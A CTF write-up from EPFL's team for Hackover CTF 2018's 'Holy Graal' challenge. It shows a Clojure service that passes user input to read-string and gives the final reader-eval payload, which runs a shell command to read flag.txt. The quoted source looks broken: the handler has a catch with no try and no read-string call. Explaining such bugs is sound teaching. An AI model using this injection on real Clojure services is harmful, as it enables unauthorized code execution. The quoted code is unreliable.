
EPFL's CTF team

Hackover CTF 2018: Holy Graal


Everybody keeps talking about this new JIT. I think it is more secure, wouldn’t you agree?

compiled with: native-image -H:+ReportUnsupportedElementsAtRuntime

Try our service at:

nc holy-graal.ctf.hackover.de 1337


(ns main
  (:require [clojure.java.shell :as shell])

;; We want to be sure none of our calls relies on reflection.
(set! *warn-on-reflection* 1)

(defmulti option identity)
(defmethod option "1" [_]
    (-> (read-line)
    (println "Good job, you know how to balance brackets. Now go, get the flag.")
    (catch Exception e
      (println "You need to work on your balancing skills."))))

(defmethod option "2" [_]
  (println "Exiting.")
  (System/exit 0))

(defmethod option :default [_]
  (println "Invalid choice."))

(defn- print-options []
  (println "1: Send string")
  (println "2: Exit"))

(defn- get-graal-version []
  (->> (clojure.java.shell/sh "native-image" "--version")
       (re-find #"\d.\d.\d-\w+")))

(defn -main []
  (println "Welcome to HolyGraal version" (get-graal-version))
  (println "Everybody knows that keeping track of brackets is hard in LISP languages.")
  (println "We now introduce: verify brackets as a service.")
  (loop [input (read-line)]
    (option input)
    (recur (read-line))))


The server is running a Clojure script that checks that the input has balanced brackets. The script works by reading a line and then passing the result to read-string, then reporting an error if any exceptions are thrown.

From the documentation of read-string:

Reads one object from the string s. Optionally include reader
options, as specified in read.

 Note that read-string can execute code (controlled by *read-eval*),
and as such should be used only with trusted sources.

It appears that the server is evaluating our input, which will raise an exception if the brackets are unbalanced (because it’s a syntax error).

By googling a bit we found an exploit POC which we adapted to execute shell commands and show us their output.

Final exploit code: #=(println #=(clojure.java.shell/sh "cat" "flag.txt"))

Flag: hackover18{n3v3r_tru5s7_u53r_1npu7}